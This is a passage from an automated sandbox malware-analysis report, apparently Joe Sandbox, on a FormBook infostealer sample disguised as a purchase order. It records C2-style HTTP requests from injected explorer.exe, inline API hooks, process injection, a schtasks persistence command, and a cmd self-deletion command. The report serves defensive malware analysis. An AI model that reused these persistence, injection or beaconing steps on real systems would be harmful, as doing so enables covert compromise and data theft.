Feb 23, 2021 08:59:46.288347960 CET	6822	IN	Data Raw: 6d 61 78 2d 77 69 64 74 68 3a 20 39 35 25 3b 7d 0d 0a 20 20 20 20 2e 73 72 63 68 54 78 74 7b 77 69 64 74 68 3a 20 32 30 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 30 70 78 7d 20 20 20 20 Data Ascii: max-width: 95%;} .srchTxt{width: 200px;font-size: 16px;line-height: 20px} }.content-container{background: none !important}.main-container{border:none !important;height: auto !important}.header{border:none !important;height: a
Feb 23, 2021 08:59:46.369762897 CET	6824	IN	Data Raw: 20 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 Data Ascii: </style><![endif]--><script language="JavaScript" type="text/javascript" src="http://i3.cdn-image.com/__media__/js/min.js?v2.2"></script></head><body onload="" onunload="" onBeforeUnload=""><div style="visibility:hidden;display:no
Feb 23, 2021 08:59:46.450568914 CET	6825	IN	Data Raw: 63 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 70 68 61 7a 61 72 64 2e 63 6f 6d 2f 64 69 73 70 6c 61 79 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 20 6f 6e 73 75 62 6d 69 74 3d 22 Data Ascii: ction="http://www.pophazard.com/display.cfm" method="get" target="_top" onsubmit="showPop=0;" > <input name="s" type="text" onClick="this.value='';" class="srchTxt" /> <in
Feb 23, 2021 08:59:46.450594902 CET	6827	IN	Data Raw: 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 70 68 61 7a 61 72 64 2e 63 6f 6d 2f 48 65 61 6c 74 68 79 5f 57 65 69 67 68 74 5f 4c 6f 73 73 2e 63 66 6d 3f 66 70 3d 48 39 34 45 33 75 32 55 4b 68 25 32 46 4a 77 33 49 51 5a 6f 4d 46 70 Data Ascii: href="http://www.pophazard.com/Healthy_Weight_Loss.cfm?fp=H94E3u2UKh%2FJw3IQZoMFpxBfFtP8RYYe1XROH%2FLWuv03x%2BYwTIjq9PVhIqlZ5FYxt138zvMNFsz07SWoESV%2B8%2FAw6quh8g2tkJaAuExIFuF9%2Bhu6bfnLwYM75bRQ0nY%2BB8ejipiU7Aa5%2B7Y3nbkuy1ARjDN02YrtVTYXHHKk

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49765	103.66.59.142	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:00:05.239259958 CET	6841	OUT	GET /ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb HTTP/1.1 Host: www.246835.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:00:05.594891071 CET	6841	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: https://www.246835.com/ntg/?ojohzz=w4x+hauhjfrojmp94c1onpoapenzzptxtrzxhswsn9e2urxoamjimifvyc4x6954j+dz&1bm=gpd0lnkpffhtab Server: Microsoft-IIS/10.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Tue, 23 Feb 2021 08:00:05 GMT Connection: close Content-Length: 243 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 32 34 36 38 33 35 2e 63 6f 6d 2f 6e 74 67 2f 3f 6f 6a 6f 68 7a 7a 3d 77 34 78 2b 68 61 75 68 6a 66 72 6f 6a 6d 70 39 34 63 31 6f 6e 70 6f 61 70 65 6e 7a 7a 70 74 78 74 72 7a 78 68 73 77 73 6e Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.246835.com/ntg/?ojohzz=w4x+hauhjfrojmp94c1onpoapenzzptxtrzxhswsn
Feb 23, 2021 09:00:05.594916105 CET	6842	IN	Data Raw: 39 65 32 75 72 78 6f 61 6d 6a 69 6d 69 66 76 79 63 34 78 36 39 35 34 6a 2b 64 7a 26 61 6d 70 3b 31 62 6d 3d 67 70 64 30 6c 6e 6b 70 66 66 68 74 61 62 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: 9e2urxoamjimifvyc4x6954j+dz&1bm=gpd0lnkpffhtab">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49767	23.229.197.103	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:00:26.050930977 CET	6853	OUT	GET /ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb HTTP/1.1 Host: www.kaieteurny.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:00:26.258440971 CET	6854	IN	HTTP/1.1 500 Internal Server Error Date: Tue, 23 Feb 2021 08:00:26 GMT Server: Apache Content-Length: 676 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6b 61 69 65 74 65 75 72 6e 79 2e 63 6c 69 71 75 65 73 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@kaieteurny.cliques.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE6
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE6
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE6
GetMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE6

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO_210223.exe PID: 6976 Parent PID: 5920

General

Start time:	08:58:25
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\PO_210223.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PO_210223.exe'
Imagebase:	0x890000
File size:	802304 bytes
MD5 hash:	E40AF9745E938B72D5D860BBC679AEBF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 1556 Parent PID: 6976

General

Start time:	08:58:39
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
Imagebase:	0xb80000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1744 Parent PID: 1556

General

Start time:	08:58:39
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PO_210223.exe PID: 1868 Parent PID: 6976

General

Start time:	08:58:40
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\PO_210223.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PO_210223.exe
Imagebase:	0xc30000
File size:	802304 bytes
MD5 hash:	E40AF9745E938B72D5D860BBC679AEBF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 1868

General

Start time:	08:58:42
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ipconfig.exe PID: 6744 Parent PID: 3424

General

Start time:	08:58:56
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\ipconfig.exe
Imagebase:	0xe50000
File size:	29184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7112 Parent PID: 6744

General

Start time:	08:59:00
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\PO_210223.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7092 Parent PID: 7112

General

Start time:	08:59:01
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PO_210223.exe PID: 6976 Parent PID: 5920 PO_210223.exeCOMMON

Executed Functions

Function 01283063, Relevance: 2.8, Strings: 2, Instructions: 298COMMON

Download Yara Rule

Strings

^{, xrefs: 012831AA
hWL, xrefs: 01283445

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID: hWL$^{
API String ID: 0-3737753556
Opcode ID: 2b6813c8f4f57eb2cb8bf66c59e5d412b5406d109614303605d823df065ee572
Instruction ID: 1397e070ac3c75fb4e8a225c05c60a3bc13654fefbaf97eab2d542f4d842bf00
Opcode Fuzzy Hash: 2b6813c8f4f57eb2cb8bf66c59e5d412b5406d109614303605d823df065ee572
Instruction Fuzzy Hash: A8D1BC74D1520ACFCB04EFA5C8818AEFBB2FF89710B14C45AD411AB259D738DA82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012830D0, Relevance: 2.8, Strings: 2, Instructions: 272COMMON

Download Yara Rule

Strings

^{, xrefs: 012831AA
hWL, xrefs: 01283445

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID: hWL$^{
API String ID: 0-3737753556
Opcode ID: eb35d50ec90f685249daf6f9c2cfa0f39af8300d9bb31deff65bd3670b86c666
Instruction ID: 335d7aba8b4f3a1df335c872375a424577503d92822e3fc7d247d5c7b7aef05f
Opcode Fuzzy Hash: eb35d50ec90f685249daf6f9c2cfa0f39af8300d9bb31deff65bd3670b86c666
Instruction Fuzzy Hash: 1CC158B4E1520ACFCB04EF95D4819AEFBB2FF88710B24C555D516AB258D734EA82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01280FD4, Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

fn, xrefs: 01281194

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID: fn
API String ID: 0-1079386521
Opcode ID: 8e968460d826d2982c0441f69dec4713421e5441d857f4415975957bb57ae94d
Instruction ID: fa1e10132f0521eb5b6f31a4f1bf0818bb49199907f5da7189118bf2db3ad8ed
Opcode Fuzzy Hash: 8e968460d826d2982c0441f69dec4713421e5441d857f4415975957bb57ae94d
Instruction Fuzzy Hash: 1081F374E112598FDB08DFE9C944AEEFBB2FF89310F24802AD915AB294DB355906CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01280FF8, Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

fn, xrefs: 01281194

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID: fn
API String ID: 0-1079386521
Opcode ID: b74612e51cf6cac3219dd55dd6a53abcbcab44bc6d34575e3808a51e06a75164
Instruction ID: 62f2b2cbc53b354508a459b75c8b214211b450c50ccff199b806607e07f71fea
Opcode Fuzzy Hash: b74612e51cf6cac3219dd55dd6a53abcbcab44bc6d34575e3808a51e06a75164
Instruction Fuzzy Hash: 9881D3B4E112198FDB08DFE9D9846EEFBB2BF89300F10802AD915AB394D7755946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01281851, Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

yMD, xrefs: 0128199E

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID: yMD
API String ID: 0-1573471459
Opcode ID: 352ba1ba612c27c1c9ebadba3dfe042edf514e9951e45ad00eba7df62fbe27e3
Instruction ID: 8f875e65d677a52bf8a36f4fa24c767f869f0b79598a62a782ea22b265ad97df
Opcode Fuzzy Hash: 352ba1ba612c27c1c9ebadba3dfe042edf514e9951e45ad00eba7df62fbe27e3
Instruction Fuzzy Hash: A3514B70E1524A8FDB08DFAAC5416AEFBF2FF89300F14C06AD459A7294D7388A52CF55

Uniqueness

Uniqueness Score: -1.00%

Function 09ABB098, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246d5e64a83126c07a06796817d6fc1d972e6d673b070adda8ef06d0a7a2583b
Instruction ID: be54006373051cfdc6b6c4d707785ae965118ddbc285aa14b2b0a7e9b4ece3ea
Opcode Fuzzy Hash: 246d5e64a83126c07a06796817d6fc1d972e6d673b070adda8ef06d0a7a2583b
Instruction Fuzzy Hash: 96B15D71A00215DFCB14DF6AD994AEDB7B9FF84710F168069E815AF2A2D730ED41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 09AB6100, Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b5a2417b27ee5dae33448c8af18e5fa4ad76a414910d0dc12365698d1f48b60
Instruction ID: 4caa22f17aadb9f74e84b65596dfb81e8cf99e9ff16b1974c9b8f82cb8e1414b
Opcode Fuzzy Hash: 7b5a2417b27ee5dae33448c8af18e5fa4ad76a414910d0dc12365698d1f48b60
Instruction Fuzzy Hash: 829103B4E042598FDB04DFA9C644ADEBBF6BF89320F25C129D408AB346E7349941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 012821F8, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 948662e357170b197c9daf9aaf82c809c26a87ebdac20ec80f7829717986d6d0
Instruction ID: 81d7199ab7570231cba202fc3d265bc82187ca7f0fea3d8018286f5d1655fd21
Opcode Fuzzy Hash: 948662e357170b197c9daf9aaf82c809c26a87ebdac20ec80f7829717986d6d0
Instruction Fuzzy Hash: 9C512770E02258CFDB64CF66C9846DDBBB2FF89310F1480AAD948AB358DB345A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 09AB9DD0, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0589147da2f1ab7d7365547e6cc8e18930c4b01f87c9e7b66fb7857151c1d51
Instruction ID: 331dc8453097f0927fc4a02533a412f4ea4aa6c4b016b65a47ce7bdaba1f28aa
Opcode Fuzzy Hash: d0589147da2f1ab7d7365547e6cc8e18930c4b01f87c9e7b66fb7857151c1d51
Instruction Fuzzy Hash: D7311C71D04218CBEB28CF66CD007DEBAF7ABC9704F14C0AA9909AB255DB714A81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0128EE70, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0128EED0
GetCurrentThread.KERNEL32 ref: 0128EF0D
GetCurrentProcess.KERNEL32 ref: 0128EF4A
GetCurrentThreadId.KERNEL32 ref: 0128EFA3

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1d04261268ffc063dcca821e9b0084fb6d362777e64424c43f181dc92e711e84
Instruction ID: ca9a8cca1d6ffa3969b6eac29bfa33e660f7807ffc6d0ecdf854acbf39bf6f31
Opcode Fuzzy Hash: 1d04261268ffc063dcca821e9b0084fb6d362777e64424c43f181dc92e711e84
Instruction Fuzzy Hash: BF5154B4901249CFDB24DFAAD588BDEBBF0FF88314F218559E119A7290D7346844CB65

Uniqueness

Uniqueness Score: -1.00%

Function 09AB7E38, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09AB80FF

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 997a92ec286d237acc611c972e624f962acae74e82fd1d10a3432a17c956af60
Instruction ID: b2144636abf6dfd41d1d930af1372ea201a6986957f3460bde357dfb8e1a5e6c
Opcode Fuzzy Hash: 997a92ec286d237acc611c972e624f962acae74e82fd1d10a3432a17c956af60
Instruction Fuzzy Hash: 7DC13571D0022D8FDB20DFA8C841BEDBBB5BF49304F0095A9E519BB251DBB49A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 09AB7A80, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09AB7B53

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0ecc81d809d6f86a5dfbb33e4f33bdf49850b6daa33d8722ed00b2b0c5fe64b4
Instruction ID: 32b8a077f01c76fe6bb2e326cbd40929629924ec9bf4c4ae8fde59e5bdda7185
Opcode Fuzzy Hash: 0ecc81d809d6f86a5dfbb33e4f33bdf49850b6daa33d8722ed00b2b0c5fe64b4
Instruction Fuzzy Hash: A041BCB4D012589FCF00CFA9D984AEEFBF5BB49314F10902AE419B7210D774AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0128F098, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128F163

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 524a035768968de054218ada194fe4568495f89dcdb662fe857fe9ac5b2ad7c3
Instruction ID: d0eb09d3174980ae217f7727f366c7f84a33d7c7d0c21b7b77df7c745aa33622
Opcode Fuzzy Hash: 524a035768968de054218ada194fe4568495f89dcdb662fe857fe9ac5b2ad7c3
Instruction Fuzzy Hash: 7B4164B9D012589FCF00CFA9D984ADEBBF4BB09310F14902AE918BB310D335A995CF94

Uniqueness

Uniqueness Score: -1.00%

Function 09AB7BD8, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09AB7C8A

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 12df0703d5643a5c71e6fa3d10d4e10269745d421af3371b828279e9f8ce80dc
Instruction ID: 093079dfb30c592baa41116fda898a011dd94e5b1aa3909c3d325a8298d48717
Opcode Fuzzy Hash: 12df0703d5643a5c71e6fa3d10d4e10269745d421af3371b828279e9f8ce80dc
Instruction Fuzzy Hash: DA41A8B9D04258DFCF10CFAAD880AEEFBB5BB49310F10902AE815B7210C778A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09AB7960, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09AB7A0A

Memory Dump Source

